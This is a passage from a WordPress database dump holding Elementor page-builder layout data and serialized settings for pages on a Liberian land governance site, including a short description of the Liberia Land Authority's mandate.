_mode','builder'),(9520,1659,'_elementor_template_type','wp-page'),(9521,1659,'_elementor_version','2.7.5'),(9522,1659,'_wp_page_template','default'),(9523,1659,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"posts_query\":\"category\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"resource_type\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f205ddb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9525,1660,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}}'),(9526,1660,'_elementor_edit_mode','builder'),(9527,1660,'_elementor_template_type','wp-post'),(9528,1660,'_elementor_version','2.7.5'),(9529,1660,'_wp_page_template','default'),(9530,1660,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ba7389\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LiMA<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"908717c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f724005\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e8e43d1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e90eb8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"dc789d8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5c8514a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e8e43d1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"0d7f837\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2b837d4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9531,1661,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}}'),(9532,1661,'_elementor_edit_mode','builder'),(9533,1661,'_elementor_template_type','wp-post'),(9534,1661,'_elementor_version','2.7.5'),(9535,1661,'_wp_page_template','default'),(9536,1661,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ddbf8c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ae9ef75\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"76bf2a4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9805e76\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"b459a9b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"59bae93\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a6f3777\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9805e76\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"609696b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5e7c582\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9537,1662,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}}'),(9538,1662,'_elementor_edit_mode','builder'),(9539,1662,'_elementor_template_type','wp-post'),(9540,1662,'_elementor_version','2.7.5'),(9541,1662,'_wp_page_template','default'),(9542,1662,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9160c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia. LLA is a product of the policy, legal and institutional reform of the land sector of Liberia led by the erstwhile Land Commission.\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2b443bf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured 